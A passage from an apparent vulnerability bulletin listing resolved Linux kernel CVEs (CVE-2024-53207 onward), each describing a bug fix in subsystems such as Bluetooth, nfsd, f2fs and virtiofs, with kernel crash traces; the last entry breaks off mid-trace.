In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: Fix possible deadlocks This fixes possible deadlocks like the following caused by hci_cmd_sync_dequeue causing the destroy function to run: INFO: task kworker/u19:0:143 blocked for more than 120 seconds. Tainted: G W O 6.8.0-2024-03-19-intel-next-iLS-24ww14 #1 "echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message. task:kworker/u19:0 state:D stack:0 pid:143 tgid:143 ppid:2 flags:0x00004000 Workqueue: hci0 hci_cmd_sync_work [bluetooth] Call Trace: <TASK> __schedule+0x374/0xaf0 schedule+0x3c/0xf0 schedule_preempt_disabled+0x1c/0x30 __mutex_lock.constprop.0+0x3ef/0x7a0 __mutex_lock_slowpath+0x13/0x20 mutex_lock+0x3c/0x50 mgmt_set_connectable_complete+0xa4/0x150 [bluetooth] ? kfree+0x211/0x2a0 hci_cmd_sync_dequeue+0xae/0x130 [bluetooth] ? __pfx_cmd_complete_rsp+0x10/0x10 [bluetooth] cmd_complete_rsp+0x26/0x80 [bluetooth] mgmt_pending_foreach+0x4d/0x70 [bluetooth] __mgmt_power_off+0x8d/0x180 [bluetooth] ? _raw_spin_unlock_irq+0x23/0x40 hci_dev_close_sync+0x445/0x5b0 [bluetooth] hci_set_powered_sync+0x149/0x250 [bluetooth] set_powered_sync+0x24/0x60 [bluetooth] hci_cmd_sync_work+0x90/0x150 [bluetooth] process_one_work+0x13e/0x300 worker_thread+0x2f7/0x420 ? __pfx_worker_thread+0x10/0x10 kthread+0x107/0x140 ? __pfx_kthread+0x10/0x10 ret_from_fork+0x3d/0x60 ? __pfx_kthread+0x10/0x10 ret_from_fork_asm+0x1b/0x30 </TASK> | 2024-12-27 | not yet calculated | CVE-2024-53207 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: Bluetooth: MGMT: Fix slab-use-after-free Read in set_powered_sync This fixes the following crash: ================================================================== BUG: KASAN: slab-use-after-free in set_powered_sync+0x3a/0xc0 net/bluetooth/mgmt.c:1353 Read of size 8 at addr ffff888029b4dd18 by task kworker/u9:0/54 CPU: 1 UID: 0 PID: 54 Comm: kworker/u9:0 Not tainted 6.11.0-rc6-syzkaller-01155-gf723224742fc #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 08/06/2024 Workqueue: hci0 hci_cmd_sync_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:93 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:119 print_address_description mm/kasan/report.c:377 [inline] print_report+0x169/0x550 mm/kasan/report.c:488 q kasan_report+0x143/0x180 mm/kasan/report.c:601 set_powered_sync+0x3a/0xc0 net/bluetooth/mgmt.c:1353 hci_cmd_sync_work+0x22b/0x400 net/bluetooth/hci_sync.c:328 process_one_work kernel/workqueue.c:3231 [inline] process_scheduled_works+0xa2c/0x1830 kernel/workqueue.c:3312 worker_thread+0x86d/0xd10 kernel/workqueue.c:3389 kthread+0x2f0/0x390 kernel/kthread.c:389 ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 </TASK> Allocated by task 5247: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3f/0x80 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:370 [inline] __kasan_kmalloc+0x98/0xb0 mm/kasan/common.c:387 kasan_kmalloc include/linux/kasan.h:211 [inline] __kmalloc_cache_noprof+0x19c/0x2c0 mm/slub.c:4193 kmalloc_noprof include/linux/slab.h:681 [inline] kzalloc_noprof include/linux/slab.h:807 [inline] mgmt_pending_new+0x65/0x250 net/bluetooth/mgmt_util.c:269 mgmt_pending_add+0x36/0x120 net/bluetooth/mgmt_util.c:296 set_powered+0x3cd/0x5e0 net/bluetooth/mgmt.c:1394 hci_mgmt_cmd+0xc47/0x11d0 net/bluetooth/hci_sock.c:1712 hci_sock_sendmsg+0x7b8/0x11c0 net/bluetooth/hci_sock.c:1832 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg+0x221/0x270 net/socket.c:745 sock_write_iter+0x2dd/0x400 net/socket.c:1160 new_sync_write fs/read_write.c:497 [inline] vfs_write+0xa72/0xc90 fs/read_write.c:590 ksys_write+0x1a0/0x2c0 fs/read_write.c:643 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Freed by task 5246: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x3f/0x80 mm/kasan/common.c:68 kasan_save_free_info+0x40/0x50 mm/kasan/generic.c:579 poison_slab_object+0xe0/0x150 mm/kasan/common.c:240 __kasan_slab_free+0x37/0x60 mm/kasan/common.c:256 kasan_slab_free include/linux/kasan.h:184 [inline] slab_free_hook mm/slub.c:2256 [inline] slab_free mm/slub.c:4477 [inline] kfree+0x149/0x360 mm/slub.c:4598 settings_rsp+0x2bc/0x390 net/bluetooth/mgmt.c:1443 mgmt_pending_foreach+0xd1/0x130 net/bluetooth/mgmt_util.c:259 __mgmt_power_off+0x112/0x420 net/bluetooth/mgmt.c:9455 hci_dev_close_sync+0x665/0x11a0 net/bluetooth/hci_sync.c:5191 hci_dev_do_close net/bluetooth/hci_core.c:483 [inline] hci_dev_close+0x112/0x210 net/bluetooth/hci_core.c:508 sock_do_ioctl+0x158/0x460 net/socket.c:1222 sock_ioctl+0x629/0x8e0 net/socket.c:1341 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:907 [inline] __se_sys_ioctl+0xfc/0x170 fs/ioctl.c:893 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83gv entry_SYSCALL_64_after_hwframe+0x77/0x7f | 2024-12-27 | not yet calculated | CVE-2024-53208 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: bnxt_en: Fix receive ring space parameters when XDP is active The MTU setting at the time an XDP multi-buffer is attached determines whether the aggregation ring will be used and the rx_skb_func handler. This is done in bnxt_set_rx_skb_mode(). If the MTU is later changed, the aggregation ring setting may need to be changed and it may become out-of-sync with the settings initially done in bnxt_set_rx_skb_mode(). This may result in random memory corruption and crashes as the HW may DMA data larger than the allocated buffer size, such as: BUG: kernel NULL pointer dereference, address: 00000000000003c0 PGD 0 P4D 0 Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 17 PID: 0 Comm: swapper/17 Kdump: loaded Tainted: G S OE 6.1.0-226bf9805506 #1 Hardware name: Wiwynn Delta Lake PVT BZA.02601.0150/Delta Lake-Class1, BIOS F0E_3A12 08/26/2021 RIP: 0010:bnxt_rx_pkt+0xe97/0x1ae0 [bnxt_en] Code: 8b 95 70 ff ff ff 4c 8b 9d 48 ff ff ff 66 41 89 87 b4 00 00 00 e9 0b f7 ff ff 0f b7 43 0a 49 8b 95 a8 04 00 00 25 ff 0f 00 00 <0f> b7 14 42 48 c1 e2 06 49 03 95 a0 04 00 00 0f b6 42 33f RSP: 0018:ffffa19f40cc0d18 EFLAGS: 00010202 RAX: 00000000000001e0 RBX: ffff8e2c805c6100 RCX: 00000000000007ff RDX: 0000000000000000 RSI: ffff8e2c271ab990 RDI: ffff8e2c84f12380 RBP: ffffa19f40cc0e48 R08: 000000000001000d R09: 974ea2fcddfa4cbf R10: 0000000000000000 R11: ffffa19f40cc0ff8 R12: ffff8e2c94b58980 R13: ffff8e2c952d6600 R14: 0000000000000016 R15: ffff8e2c271ab990 FS: 0000000000000000(0000) GS:ffff8e3b3f840000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00000000000003c0 CR3: 0000000e8580a004 CR4: 00000000007706e0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 PKRU: 55555554 Call Trace: <IRQ> __bnxt_poll_work+0x1c2/0x3e0 [bnxt_en] To address the issue, we now call bnxt_set_rx_skb_mode() within bnxt_change_mtu() to properly set the AGG rings configuration and update rx_skb_func based on the new MTU value. Additionally, BNXT_FLAG_NO_AGG_RINGS is cleared at the beginning of bnxt_set_rx_skb_mode() to make sure it gets set or cleared based on the current MTU. | 2024-12-27 | not yet calculated | CVE-2024-53209 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: s390/iucv: MSG_PEEK causes memory leak in iucv_sock_destruct() Passing MSG_PEEK flag to skb_recv_datagram() increments skb refcount (skb->users) and iucv_sock_recvmsg() does not decrement skb refcount at exit. This results in skb memory leak in skb_queue_purge() and WARN_ON in iucv_sock_destruct() during socket close. To fix this decrease skb refcount by one if MSG_PEEK is set in order to prevent memory leak and WARN_ON. WARNING: CPU: 2 PID: 6292 at net/iucv/af_iucv.c:286 iucv_sock_destruct+0x144/0x1a0 [af_iucv] CPU: 2 PID: 6292 Comm: afiucv_test_msg Kdump: loaded Tainted: G W 6.10.0-rc7 #1 Hardware name: IBM 3931 A01 704 (z/VM 7.3.0) Call Trace: [<001587c682c4aa98>] iucv_sock_destruct+0x148/0x1a0 [af_iucv] [<001587c682c4a9d0>] iucv_sock_destruct+0x80/0x1a0 [af_iucv] [<001587c704117a32>] __sk_destruct+0x52/0x550 [<001587c704104a54>] __sock_release+0xa4/0x230 [<001587c704104c0c>] sock_close+0x2c/0x40 [<001587c702c5f5a8>] __fput+0x2e8/0x970 [<001587c7024148c4>] task_work_run+0x1c4/0x2c0 [<001587c7023b0716>] do_exit+0x996/0x1050 [<001587c7023b13aa>] do_group_exit+0x13a/0x360 [<001587c7023b1626>] __s390x_sys_exit_group+0x56/0x60 [<001587c7022bccca>] do_syscall+0x27a/0x380 [<001587c7049a6a0c>] __do_syscall+0x9c/0x160 [<001587c7049ce8a8>] system_call+0x70/0x98 Last Breaking-Event-Address: [<001587c682c4a9d4>] iucv_sock_destruct+0x84/0x1a0 [af_iucv] | 2024-12-27 | not yet calculated | CVE-2024-53210 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net/l2tp: fix warning in l2tp_exit_net found by syzbot In l2tp's net exit handler, we check that an IDR is empty before destroying it: WARN_ON_ONCE(!idr_is_empty(&pn->l2tp_tunnel_idr)); idr_destroy(&pn->l2tp_tunnel_idr); By forcing memory allocation failures in idr_alloc_32, syzbot is able to provoke a condition where idr_is_empty returns false despite there being no items in the IDR. This turns out to be because the radix tree of the IDR contains only internal radix-tree nodes and it is this that causes idr_is_empty to return false. The internal nodes are cleaned by idr_destroy. Use idr_for_each to check that the IDR is empty instead of idr_is_empty to avoid the problem. | 2024-12-27 | not yet calculated | CVE-2024-53211 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: netlink: fix false positive warning in extack during dumps Commit under fixes extended extack reporting to dumps. It works under normal conditions, because extack errors are usually reported during ->start() or the first ->dump(), it's quite rare that the dump starts okay but fails later. If the dump does fail later, however, the input skb will already have the initiating message pulled, so checking if bad attr falls within skb->data will fail. Switch the check to using nlh, which is always valid. syzbot found a way to hit that scenario by filling up the receive queue. In this case we initiate a dump but don't call ->dump() until there is read space for an skb. WARNING: CPU: 1 PID: 5845 at net/netlink/af_netlink.c:2210 netlink_ack_tlv_fill+0x1a8/0x560 net/netlink/af_netlink.c:2209 RIP: 0010:netlink_ack_tlv_fill+0x1a8/0x560 net/netlink/af_netlink.c:2209 Call Trace: <TASK> netlink_dump_done+0x513/0x970 net/netlink/af_netlink.c:2250 netlink_dump+0x91f/0xe10 net/netlink/af_netlink.c:2351 netlink_recvmsg+0x6bb/0x11d0 net/netlink/af_netlink.c:1983 sock_recvmsg_nosec net/socket.c:1051 [inline] sock_recvmsg+0x22f/0x280 net/socket.c:1073 __sys_recvfrom+0x246/0x3d0 net/socket.c:2267 __do_sys_recvfrom net/socket.c:2285 [inline] __se_sys_recvfrom net/socket.c:2281 [inline] __x64_sys_recvfrom+0xde/0x100 net/socket.c:2281 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7ff37dd17a79 | 2024-12-27 | not yet calculated | CVE-2024-53212 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: net: usb: lan78xx: Fix double free issue with interrupt buffer allocation In lan78xx_probe(), the buffer `buf` was being freed twice: once implicitly through `usb_free_urb(dev->urb_intr)` with the `URB_FREE_BUFFER` flag and again explicitly by `kfree(buf)`. This caused a double free issue. To resolve this, reordered `kmalloc()` and `usb_alloc_urb()` calls to simplify the initialization sequence and removed the redundant `kfree(buf)`. Now, `buf` is allocated after `usb_alloc_urb()`, ensuring it is correctly managed by `usb_fill_int_urb()` and freed by `usb_free_urb()` as intended. | 2024-12-27 | not yet calculated | CVE-2024-53213 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: vfio/pci: Properly hide first-in-list PCIe extended capability There are cases where a PCIe extended capability should be hidden from the user. For example, an unknown capability (i.e., capability with ID greater than PCI_EXT_CAP_ID_MAX) or a capability that is intentionally chosen to be hidden from the user. Hiding a capability is done by virtualizing and modifying the 'Next Capability Offset' field of the previous capability so it points to the capability after the one that should be hidden. The special case where the first capability in the list should be hidden is handled differently because there is no previous capability that can be modified. In this case, the capability ID and version are zeroed while leaving the next pointer intact. This hides the capability and leaves an anchor for the rest of the capability list. However, today, hiding the first capability in the list is not done properly if the capability is unknown, as struct vfio_pci_core_device->pci_config_map is set to the capability ID during initialization but the capability ID is not properly checked later when used in vfio_config_do_rw(). This leads to the following warning [1] and to an out-of-bounds access to ecap_perms array. Fix it by checking cap_id in vfio_config_do_rw(), and if it is greater than PCI_EXT_CAP_ID_MAX, use an alternative struct perm_bits for direct read only access instead of the ecap_perms array. Note that this is safe since the above is the only case where cap_id can exceed PCI_EXT_CAP_ID_MAX (except for the special capabilities, which are already checked before). [1] WARNING: CPU: 118 PID: 5329 at drivers/vfio/pci/vfio_pci_config.c:1900 vfio_pci_config_rw+0x395/0x430 [vfio_pci_core] CPU: 118 UID: 0 PID: 5329 Comm: simx-qemu-syste Not tainted 6.12.0+ #1 (snip) Call Trace: <TASK> ? show_regs+0x69/0x80 ? __warn+0x8d/0x140 ? vfio_pci_config_rw+0x395/0x430 [vfio_pci_core] ? report_bug+0x18f/0x1a0 ? handle_bug+0x63/0xa0 ? exc_invalid_op+0x19/0x70 ? asm_exc_invalid_op+0x1b/0x20 ? vfio_pci_config_rw+0x395/0x430 [vfio_pci_core] ? vfio_pci_config_rw+0x244/0x430 [vfio_pci_core] vfio_pci_rw+0x101/0x1b0 [vfio_pci_core] vfio_pci_core_read+0x1d/0x30 [vfio_pci_core] vfio_device_fops_read+0x27/0x40 [vfio] vfs_read+0xbd/0x340 ? vfio_device_fops_unl_ioctl+0xbb/0x740 [vfio] ? __rseq_handle_notify_resume+0xa4/0x4b0 __x64_sys_pread64+0x96/0xc0 x64_sys_call+0x1c3d/0x20d0 do_syscall_64+0x4d/0x120 entry_SYSCALL_64_after_hwframe+0x76/0x7e | 2024-12-27 | not yet calculated | CVE-2024-53214 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: svcrdma: fix miss destroy percpu_counter in svc_rdma_proc_init() There's issue as follows: RPC: Registered rdma transport module. RPC: Registered rdma backchannel transport module. RPC: Unregistered rdma transport module. RPC: Unregistered rdma backchannel transport module. BUG: unable to handle page fault for address: fffffbfff80c609a PGD 123fee067 P4D 123fee067 PUD 123fea067 PMD 10c624067 PTE 0 Oops: Oops: 0000 [#1] PREEMPT SMP KASAN NOPTI RIP: 0010:percpu_counter_destroy_many+0xf7/0x2a0 Call Trace: <TASK> __die+0x1f/0x70 page_fault_oops+0x2cd/0x860 spurious_kernel_fault+0x36/0x450 do_kern_addr_fault+0xca/0x100 exc_page_fault+0x128/0x150 asm_exc_page_fault+0x26/0x30 percpu_counter_destroy_many+0xf7/0x2a0 mmdrop+0x209/0x350 finish_task_switch.isra.0+0x481/0x840 schedule_tail+0xe/0xd0 ret_from_fork+0x23/0x80 ret_from_fork_asm+0x1a/0x30 </TASK> If register_sysctl() return NULL, then svc_rdma_proc_cleanup() will not destroy the percpu counters which init in svc_rdma_proc_init(). If CONFIG_HOTPLUG_CPU is enabled, residual nodes may be in the 'percpu_counters' list. The above issue may occur once the module is removed. If the CONFIG_HOTPLUG_CPU configuration is not enabled, memory leakage occurs. To solve above issue just destroy all percpu counters when register_sysctl() return NULL. | 2024-12-27 | not yet calculated | CVE-2024-53215 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: nfsd: release svc_expkey/svc_export with rcu_work The last reference for `cache_head` can be reduced to zero in `c_show` and `e_show`(using `rcu_read_lock` and `rcu_read_unlock`). Consequently, `svc_export_put` and `expkey_put` will be invoked, leading to two issues: 1. The `svc_export_put` will directly free ex_uuid. However, `e_show`/`c_show` will access `ex_uuid` after `cache_put`, which can trigger a use-after-free issue, shown below. ================================================================== BUG: KASAN: slab-use-after-free in svc_export_show+0x362/0x430 [nfsd] Read of size 1 at addr ff11000010fdc120 by task cat/870 CPU: 1 UID: 0 PID: 870 Comm: cat Not tainted 6.12.0-rc3+ #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.1-2.fc37 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x53/0x70 print_address_description.constprop.0+0x2c/0x3a0 print_report+0xb9/0x280 kasan_report+0xae/0xe0 svc_export_show+0x362/0x430 [nfsd] c_show+0x161/0x390 [sunrpc] seq_read_iter+0x589/0x770 seq_read+0x1e5/0x270 proc_reg_read+0xe1/0x140 vfs_read+0x125/0x530 ksys_read+0xc1/0x160 do_syscall_64+0x5f/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e Allocated by task 830: kasan_save_stack+0x20/0x40 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x8f/0xa0 __kmalloc_node_track_caller_noprof+0x1bc/0x400 kmemdup_noprof+0x22/0x50 svc_export_parse+0x8a9/0xb80 [nfsd] cache_do_downcall+0x71/0xa0 [sunrpc] cache_write_procfs+0x8e/0xd0 [sunrpc] proc_reg_write+0xe1/0x140 vfs_write+0x1a5/0x6d0 ksys_write+0xc1/0x160 do_syscall_64+0x5f/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e Freed by task 868: kasan_save_stack+0x20/0x40 kasan_save_track+0x14/0x30 kasan_save_free_info+0x3b/0x60 __kasan_slab_free+0x37/0x50 kfree+0xf3/0x3e0 svc_export_put+0x87/0xb0 [nfsd] cache_purge+0x17f/0x1f0 [sunrpc] nfsd_destroy_serv+0x226/0x2d0 [nfsd] nfsd_svc+0x125/0x1e0 [nfsd] write_threads+0x16a/0x2a0 [nfsd] nfsctl_transaction_write+0x74/0xa0 [nfsd] vfs_write+0x1a5/0x6d0 ksys_write+0xc1/0x160 do_syscall_64+0x5f/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e 2. We cannot sleep while using `rcu_read_lock`/`rcu_read_unlock`. However, `svc_export_put`/`expkey_put` will call path_put, which subsequently triggers a sleeping operation due to the following `dput`. ============================= WARNING: suspicious RCU usage 5.10.0-dirty #141 Not tainted ----------------------------- ... Call Trace: dump_stack+0x9a/0xd0 ___might_sleep+0x231/0x240 dput+0x39/0x600 path_put+0x1b/0x30 svc_export_put+0x17/0x80 e_show+0x1c9/0x200 seq_read_iter+0x63f/0x7c0 seq_read+0x226/0x2d0 vfs_read+0x113/0x2c0 ksys_read+0xc9/0x170 do_syscall_64+0x33/0x40 entry_SYSCALL_64_after_hwframe+0x67/0xd1 Fix these issues by using `rcu_work` to help release `svc_expkey`/`svc_export`. This approach allows for an asynchronous context to invoke `path_put` and also facilitates the freeing of `uuid/exp/key` after an RCU grace period. | 2024-12-27 | not yet calculated | CVE-2024-53216 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: NFSD: Prevent NULL dereference in nfsd4_process_cb_update() @ses is initialized to NULL. If __nfsd4_find_backchannel() finds no available backchannel session, setup_callback_client() will try to dereference @ses and segfault. | 2024-12-27 | not yet calculated | CVE-2024-53217 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix race in concurrent f2fs_stop_gc_thread In my test case, concurrent calls to f2fs shutdown report the following stack trace: Oops: general protection fault, probably for non-canonical address 0xc6cfff63bb5513fc: 0000 [#1] PREEMPT SMP PTI CPU: 0 UID: 0 PID: 678 Comm: f2fs_rep_shutdo Not tainted 6.12.0-rc5-next-20241029-g6fb2fa9805c5-dirty #85 Call Trace: <TASK> ? show_regs+0x8b/0xa0 ? __die_body+0x26/0xa0 ? die_addr+0x54/0x90 ? exc_general_protection+0x24b/0x5c0 ? asm_exc_general_protection+0x26/0x30 ? kthread_stop+0x46/0x390 f2fs_stop_gc_thread+0x6c/0x110 f2fs_do_shutdown+0x309/0x3a0 f2fs_ioc_shutdown+0x150/0x1c0 __f2fs_ioctl+0xffd/0x2ac0 f2fs_ioctl+0x76/0xe0 vfs_ioctl+0x23/0x60 __x64_sys_ioctl+0xce/0xf0 x64_sys_call+0x2b1b/0x4540 do_syscall_64+0xa7/0x240 entry_SYSCALL_64_after_hwframe+0x76/0x7e The root cause is a race condition in f2fs_stop_gc_thread() called from different f2fs shutdown paths: [CPU0] [CPU1] ---------------------- ----------------------- f2fs_stop_gc_thread f2fs_stop_gc_thread gc_th = sbi->gc_thread gc_th = sbi->gc_thread kfree(gc_th) sbi->gc_thread = NULL < gc_th != NULL > kthread_stop(gc_th->f2fs_gc_task) //UAF The commit c7f114d864ac ("f2fs: fix to avoid use-after-free in f2fs_stop_gc_thread()") attempted to fix this issue by using a read semaphore to prevent races between shutdown and remount threads, but it fails to prevent all race conditions. Fix it by converting to write lock of s_umount in f2fs_do_shutdown(). | 2024-12-27 | not yet calculated | CVE-2024-53218 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: virtiofs: use pages instead of pointer for kernel direct IO When trying to insert a 10MB kernel module kept in a virtio-fs with cache disabled, the following warning was reported: ------------[ cut here ]------------ WARNING: CPU: 1 PID: 404 at mm/page_alloc.c:4551 ...... Modules linked in: CPU: 1 PID: 404 Comm: insmod Not tainted 6.9.0-rc5+ #123 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996) ...... RIP: 0010:__alloc_pages+0x2bf/0x380 ...... Call Trace: <TASK> ? __warn+0x8e/0x150 ? __alloc_pages+0x2bf/0x380 __kmalloc_large_node+0x86/0x160 __kmalloc+0x33c/0x480 virtio_fs_enqueue_req+0x240/0x6d0 virtio_fs_wake_pending_and_unlock+0x7f/0x190 queue_request_and_unlock+0x55/0x60 fuse_simple_request+0x152/0x2b0 fuse_direct_io+0x5d2/0x8c0 fuse_file_read_iter+0x121/0x160 __kernel_read+0x151/0x2d0 kernel_read+0x45/0x50 kernel_read_file+0x1a9/0x2a0 init_module_from_file+0x6a/0xe0 idempotent_init_module+0x175/0x230 __x64_sys_finit_module+0x5d/0xb0 x64_sys_call+0x1c3/0x9e0 do_syscall_64+0x3d/0xc0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 ...... </TASK> ---[ end trace 0000000000000000 ]--- The warning is triggered as follows: 1) syscall finit_module() handles the module insertion and it invokes kernel_read_file() to read the content of the module first. 2) kernel_read_file() allocates a 10MB buffer by using vmalloc() and passes it to kernel_read(). kernel_read() constructs a kvec iter by using iov_iter_kvec() and passes it to fuse_file_read_iter(). 3) virtio-fs disables the cache, so fuse_file_read_iter() invokes fuse_direct_io(). As for now, the maximal read size for kvec iter is only limited by fc->max_read. For virtio-fs, max_read is UINT_MAX, so fuse_direct_io() doesn't split the 10MB buffer. It saves the address and the size of the 10MB-sized buffer in out_args[0] of a fuse request and passes the fuse request to virtio_fs_wake_pending_and_unlock(). 4) virtio_fs_wake_pending_and_unlock() uses virtio_fs_enqueue_req() to queue the request. Because virtiofs need DMA-able address, so virtio_fs_enqueue_req() uses kmalloc() to allocate a bounce buffer for all fuse args, copies these args into the bounce buffer and passed the physical address of the bounce buffer to virtiofsd. The total length of these fuse args for the passed fuse request is about 10MB, so copy_args_to_argbuf() invokes kmalloc() with a 10MB size parameter and it triggers the warning in __alloc_pages(): if (WARN_ON_ONCE_GFP(order > MAX_PAGE_ORDER, gfp)) return NULL; 5) virtio_fs_enqueue_req() will retry the memory allocation in a kworker, but it won't help, because kmalloc() will always return NULL due to the abnormal size and finit_module() will hang forever. A feasible solution is to limit the value of max_read for virtio-fs, so the length passed to kmalloc() will be limited. However it will affect the maximal read size for normal read. And for virtio-fs write initiated from kernel, it has the similar problem but now there is no way to limit fc->max_write in kernel. So instead of limiting both the values of max_read and max_write in kernel, introducing use_pages_for_kvec_io in fuse_conn and setting it as true in virtiofs. When use_pages_for_kvec_io is enabled, fuse will use pages instead of pointer to pass the KVEC_IO data. After switching to pages for KVEC_IO data, these pages will be used for DMA through virtio-fs. If these pages are backed by vmalloc(), {flush|invalidate}_kernel_vmap_range() are necessary to flush or invalidate the cache before the DMA operation. So add two new fields in fuse_args_pages to record the base address of vmalloc area and the condition indicating whether invalidation is needed. Perform the flush in fuse_get_user_pages() for write operations and the invalidation in fuse_release_user_pages() for read operations. It may seem necessary to introduce another fie ---truncated--- | 2024-12-27 | not yet calculated | CVE-2024-53219 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix to account dirty data in __get_secs_required() It will trigger system panic w/ testcase in [1]: ------------[ cut here ]------------ kernel BUG at fs/f2fs/segment.c:2752! RIP: 0010:new_curseg+0xc81/0x2110 Call Trace: f2fs_allocate_data_block+0x1c91/0x4540 do_write_page+0x163/0xdf0 f2fs_outplace_write_data+0x1aa/0x340 f2fs_do_write_data_page+0x797/0x2280 f2fs_write_single_data_page+0x16cd/0x2190 f2fs_write_cache_pages+0x994/0x1c80 f2fs_write_data_pages+0x9cc/0xea0 do_writepages+0x194/0x7a0 filemap_fdatawrite_wbc+0x12b/0x1a0 __filemap_fdatawrite_range+0xbb/0xf0 file_write_and_wait_range+0xa1/0x110 f2fs_do_sync_file+0x26f/0x1c50 f2fs_sync_file+0x12b/0x1d0 vfs_fsync_range+0xfa/0x230 do_fsync+0x3d/0x80 __x64_sys_fsync+0x37/0x50 x64_sys_call+0x1e88/0x20d0 do_syscall_64+0x4b/0x110 entry_SYSCALL_64_after_hwframe+0x76/0x7e The root cause is if checkpoint_disabling and lfs_mode are both on, it will trigger OPU for all overwritten data, it may cost more free segment than expected, so f2fs must account those data correctly to calculate cosumed free segments later, and return ENOSPC earlier to avoid run out of free segment during block allocation. [1] https://lore.kernel.org/fstests/20241015025106.3203676-1-chao@kernel.org/ | 2024-12-27 | not yet calculated | CVE-2024-53220 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: f2fs: fix null-ptr-deref in f2fs_submit_page_bio() There's issue as follows when concurrently installing the f2fs.ko module and mounting the f2fs file system: KASAN: null-ptr-deref in range [0x0000000000000020-0x0000000000000027] RIP: 0010:__bio_alloc+0x2fb/0x6c0 [f2fs] Call Trace: <TASK> f2fs_submit_page_bio+0x126/0x8b0 [f2fs] __get_meta_page+0x1d4/0x920 [f2fs] get_checkpoint_version.constprop.0+0x2b/0x3c0 [f2fs] validate_checkpoint+0xac/0x290 [f2fs] f2fs_get_valid_checkpoint+0x207/0x950 [f2fs] f2fs_fill_super+0x1007/0x39b0 [f2fs] mount_bdev+0x183/0x250 legacy_get_tree+0xf4/0x1e0 vfs_get_tree+0x88/0x340 do_new_mount+0x283/0x5e0 path_mount+0x2b2/0x15b0 __x64_sys_mount+0x1fe/0x270 do_syscall_64+0x5f/0x170 entry_SYSCALL_64_after_hwframe+0x76/0x7e Above issue happens as the biset of the f2fs file system is not initialized before register "f2fs_fs_type". To address above issue just register "f2fs_fs_type" at the last in init_f2fs_fs(). Ensure that all f2fs file system resources are initialized. | 2024-12-27 | not yet calculated | CVE-2024-53221 |
| n/a -- n/a |
In the Linux kernel, the following vulnerability has been resolved: zram: fix NULL pointer in comp_algorithm_show() LTP reported a NULL pointer dereference as followed: CPU: 7 UID: 0 PID: 5995 Comm: cat Kdump: loaded Not tainted 6.12.0-rc6+ #3 Hardware name: QEMU KVM Virtual Machine, BIOS 0.0.0 02/06/2015 pstate: 40400005 (nZcv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : __pi_strcmp+0x24/0x140 lr : zcomp_available_show+0x60/0x100 [zram] sp : ffff800088b93b90 x29: ffff800088b93b90 x28: 0000000000000001 x27: 0000000000400cc0 x26: 0000000000000ffe x25: ffff80007b3e2388 x24: 0000000000000000 x23: ffff80007b3e2390 x22: ffff0004041a9000 x21: ffff80007b3e2900 x20: 0000000000000000 x19: 0000000000000000 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 x11: 0000000000000000 x10: ffff80007b3e2900 x9 : ffff80007b3cb280 x8 : 0101010101010101 x7 : 0000000000000000 x6 : 0000000000000000 x5 : 0000000000000040 x4 : 0000000000000000 x3 : 00656c722d6f7a6c x2 : 0000000000000000 x1 : ffff80007b3e2900 x0 : 0000000000000000 Call trace: __pi_strcmp+0x24/0x140 comp_algorithm_show+0x40/0x70 [zram] dev_attr_show+0x28/0x80 sysfs_kf_seq_show+0x90/0x140 kernfs_seq_show+0x34/0x48 seq_read_iter+0x1d4/0x4e8 kernfs_fop_read_iter+0x40/0x58 new_sync_read+0x9c/0x168 vfs_read+0x1a8/0x1f8 ksys_read+0x74/0x108 __arm64_sys_read+0x24/0x38 invoke_syscall+0x50/0x120 